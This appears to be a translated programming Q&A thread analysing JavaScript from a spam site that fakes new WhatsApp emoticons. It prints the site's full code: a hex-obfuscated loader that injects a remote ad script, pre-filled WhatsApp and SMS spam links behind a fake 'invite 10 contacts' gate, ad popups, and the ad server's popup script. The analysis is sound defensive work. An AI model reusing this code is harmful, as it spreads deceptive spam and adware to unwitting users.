恶意网站：解读（deciphering）这段代码？

时间:2015-11-15 18:08:06

标签: javascript html spam malware

这是一个恶意网站，试图诱使访问者进一步传播它的链接，同时还会弹出广告——如果要分析它，建议在启用 NoScript（或在隔离的分析环境中）的情况下打开，不要用日常使用的浏览器直接访问。
hxxp://trucchiios[.]com/emoticon/index_en.php （URL 已做去武装化处理，请勿直接点击）
下面是按下页面上那个大 WhatsApp 按钮时执行的代码，它到底做了什么？

// Shared click counter: every press of a share button (fn1 / fn3) bumps it, and
// fn2 compares it against the "invite 10 contacts" threshold. Note it is an
// implicit global (no `var`) and counts button presses, not completed shares.
c = 0;
// Declared but never used anywhere in this listing.
var image;

/**
 * Click handler for the big "WhatsApp" share button.
 *
 * Only acts when the User-Agent matches a mobile browser; on desktop it just
 * shows an alert. Each click increments the shared counter `c`, which fn2 later
 * checks against the "invite 10 contacts" threshold, so the page counts button
 * presses rather than actual shares.
 *
 *   clicks 1-6  : open a whatsapp://send URL with the pre-filled spam text (this
 *                 hands the text to the WhatsApp app; the user still has to pick a
 *                 recipient and confirm) and report the 2nd/4th click to Google
 *                 Analytics.
 *   clicks 7-10 : same share, plus inject a remote ad script into <head> through
 *                 an obfuscated hex-escaped property-name array (decoded below).
 *   clicks 11+  : open an ad frame instead of sharing.
 *
 * @param {*} x  unused (presumably the click event)
 */
function fn1(x)
{
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 6)
        {
            // Spam payload. "_self" navigates the current tab to the custom URL scheme,
            // which the OS hands to WhatsApp. The shortened link http://xy7.co/emoticon
            // presumably leads back to this page; the trailing "15/11/15 : 17:44:07"
            // looks like a timestamp baked in server-side at render time (unverified).
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            // Google Analytics share-milestone events. `ga` is not defined in this
            // listing; if the GA snippet is missing this throws (after the share opened).
            if (c == 2) {
                ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
            } else if (c == 4) {
                ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
            }
        } else if (c <= 10) {
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 7) {
                ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
            }
            var head = document.getElementsByTagName('head').item(0);
            // _0xc631 decodes to:
            //   ["script", "createElement", "type", "text/javascript", "src",
            //    "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]",
            //    "appendChild"]
            // so the four lines after it are simply
            //   document.createElement("script") with that src, appended to <head>.
            // "[timestamp]" is sent literally — presumably an ad-server cache-buster
            // macro that was never expanded. Hex-escaped string arrays indexed like
            // this are characteristic of off-the-shelf JS obfuscators.
            var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
            var script = document[_0xc631[1]](_0xc631[0]);
            script[_0xc631[2]] = _0xc631[3];
            script[_0xc631[4]] = _0xc631[5];
            head[_0xc631[6]](script);
        } else
            // Beyond 10 clicks: no more sharing, just monetise with an ad frame.
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}

/**
 * Click handler for the SMS share button — the sms: counterpart of fn1.
 *
 * Same mobile-only User-Agent gate and the same shared counter `c`. For the
 * first 10 clicks it opens an sms: URL with the spam text pre-filled in the
 * messaging app (the user still has to choose a recipient and send); from the
 * 11th click on it opens the ad frame instead. Unlike fn1 there is no GA
 * tracking and no remote script injection here.
 *
 * @param {*} x  unused (presumably the click event)
 */
function fn3(x) {
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 10) {
            window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
        } else
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}

/**
 * Handler for the "activate the new emoticons" button — the social-engineering
 * gate.
 *
 * Once the shared counter `c` reaches 10 it opens the ad frame (there are no
 * emoticons to unlock); otherwise it nags the user with how many "contacts"
 * they still have to invite. Because `c` is incremented per button press, ten
 * presses of the share button without ever sending anything also satisfy it.
 *
 * @param {*} x  unused (presumably the click event)
 */
function fn2(x) {
    if (c >= 10)
    {
        window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else
    {
        window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited  " + c + " contacts.");
    }
}
// Fake "offer expires" countdown: writes n into #countdown once a second, starting
// at 300 (requires jQuery). When n reaches -1 (~301 s after load) the current tab is
// navigated to the ad frame and the interval is cleared. The `&` is a bitwise AND
// abused as a statement separator and the `,` chains the two expressions — typical
// minifier output, not a typo.
var n = 300,
    t = setInterval(function() {
        $("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
    }, 1e3);

希望有人能解释它的作用。我怀疑它只是广告垃圾（adspam），而不是真正的恶意软件，但请帮忙看一下。

3 个答案:

答案 0 :(得分:2)

它向页面的 &lt;head&gt; 中动态插入了一个外部 JavaScript 文件（广告脚本）：http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]

完整代码:

// The hex-escaped array from fn1 with every element decoded: each entry is a
// property name or value, so the four lines that follow are an indirect
// document.createElement("script") call. `head` is not defined in this excerpt —
// in the original it is document.getElementsByTagName('head').item(0).
var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]    
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);

去混淆后的等价代码：

// Plain-JS equivalent of the obfuscated lines: create a <script> element pointing
// at the ad server and append it to <head>, which fetches and executes it.
// `head` comes from the caller (document.getElementsByTagName('head').item(0)).
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);

.../adscript.php?pid=8673&ord=[timestamp] 这个响应通过缓存相关的响应头只会完整返回一次（之后只剩一个空操作）。第一次请求时得到的是：

 // Body returned by ads.sprintrade.com/adscript.php?pid=8673 on the first request.
 // Per-page frequency capping: document.asm_excl is a list of campaign/publisher IDs
 // to exclude (empty here — String("").split("|") yields [""]), and asm_max_2398
 // counts how many times campaign 2398 has been requested on this page.
 if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
 else{ document.asm_max_2398++; }

 var asm_ex = false;
 var asm_ex_all = false;
 // asm_ex: campaign 2398 is excluded; asm_ex_all: the whole website (w21272) or
 // publisher (p8673) is excluded, in which case nothing is shown at all.
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
 // First (and only) view of campaign 2398 on this page: load the popup helper.
 if(asm_ex_all){}
 else if(!asm_ex  && document.asm_max_2398 <= 1)
 {
   document.write(''); 
(function ()
 {
  var s, r, t;
  r = false;
  // Asynchronously load AdSpirit's popup library from a third-party CDN. Both
  // onload and onreadystatechange (legacy IE) funnel into the same initialiser;
  // readySet guards against running it twice. `r` and `t` are effectively unused.
  s = document.createElement("script");
  s.type = "text/javascript";
  s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
  s.readySet = false;
  s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
  s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
  // Popup configuration (German field names: breite/hoehe/links/oben = width/height/
  // left/top): a 1920x1080 window at (0,0) with location bar, menubar, toolbar and
  // status bar hidden and fullscreen requested, opened on click (clickpop = true),
  // not a popunder, with the frequency cookie set on sprintrade.com. The exact
  // semantics of the remaining options live in asmpop_async.js, which is not shown.
  function asm_pop_asmfls8673x5396511y1447611443()
  {
   r = true;
   var asm_pop_options = new Object()
   asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
   asm_pop_options.breite = "1920";
   asm_pop_options.hoehe = "1080";
   asm_pop_options.links = "0";
   asm_pop_options.oben = "0";
   asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
   asm_pop_options.layeronly = false;
   asm_pop_options.popunder = false;
   asm_pop_options.canlayer = false;
   asm_pop_options.clickpop = true;
   asm_pop_options.close = "0";
   asm_pop_options.booLoad = true;
   asm_pop_options.loadTime = "2";
   asm_pop_options.closeTime = "0";
   asm_pop_options.cookdom = "sprintrade.com";
   asm_pop_options.poptitle = "";
   asm_pop_options.popdomain = "http://cdn.adspirit.de";
   asm_pop_options.kid = "2398";
   asm_pop_options.pid = "8673";
   asm_pop_options.id = "asmfls8673x5396511y1447611443";
   window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
  }
  // Insert the loader right after the last <script> on the page (falls back to
  // <body>), which is what makes the "async" load actually run.
  var ss = document.getElementsByTagName("script");
  if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
  else if(document.body){document.body.appendChild(s);}
 })()
   document.write(''); 

 }
 else
 {
  // Campaign 2398 already shown (or excluded): re-request adscript.php with
  // ex=|2398 so the server rotates to a different campaign. The split
  // '<scr'+'ipt' strings stop the HTML parser from ending the enclosing <script>
  // when this code is inlined; (new Date()).getTime() is the cache-buster that
  // the literal "[timestamp]" in the first request never got.
  document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>');
 }

之后再请求同一个 URL 时只会得到：

 // Subsequent responses are just this no-op, so the popup logic runs only once.
 document.write(''); 

这样一来脚本（以及它配置的全屏点击弹窗）在每次页面加载时只会运行一次。整条链路的本质是：诱导分享以扩散链接，再通过 sprintrade.com / adspirit.de 的广告网络变现。

答案 1 :(得分:2)

这段代码看起来就是上周 WhatsApp 垃圾消息激增的原因。我很确定它是通过 whatsapp:// URL scheme 把指向该恶意网站的链接交给用户的 WhatsApp 客户端去发送的：

// Fragment of fn1 quoted by the answer: the whatsapp:// scheme hands the pre-filled
// text to the installed WhatsApp app; "_self" navigates the current tab to do so.
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");

前提是 User-Agent 被判定为移动浏览器：

if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {

另一个按钮（fn3）则改用 sms: 链接，试图让用户通过短信发送同样的内容：

"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");

点击次数达到一定数量后，这段代码还会加载若干广告（adware）网站的脚本和页面。它可能还做了其他事情，但仅从这段代码很难判断。该脚本是用 JavaScript 编写的。

答案 2 :(得分:1)

语言是Javascript。

这与 mailto: 链接（调用系统默认的邮件应用）非常相似，只是这里调用的是默认的 WhatsApp 应用或短信应用（取决于按下的是哪个按钮，而不是操作系统），并预先填好了推广文本。需要注意的是，这类链接通常只能预填内容，并不能自动发送——仍需用户在应用里选择联系人并确认，页面正是用“邀请 10 个联系人才能解锁表情”的说辞诱导用户这么做。

其中 `%0D%0A` 是 CRLF（回车 + 换行）的 URL 编码形式，用来在预填的消息里换行。

但话又说回来,如果你说它是一个很大的“WhatsApp”按钮,你期望它做什么?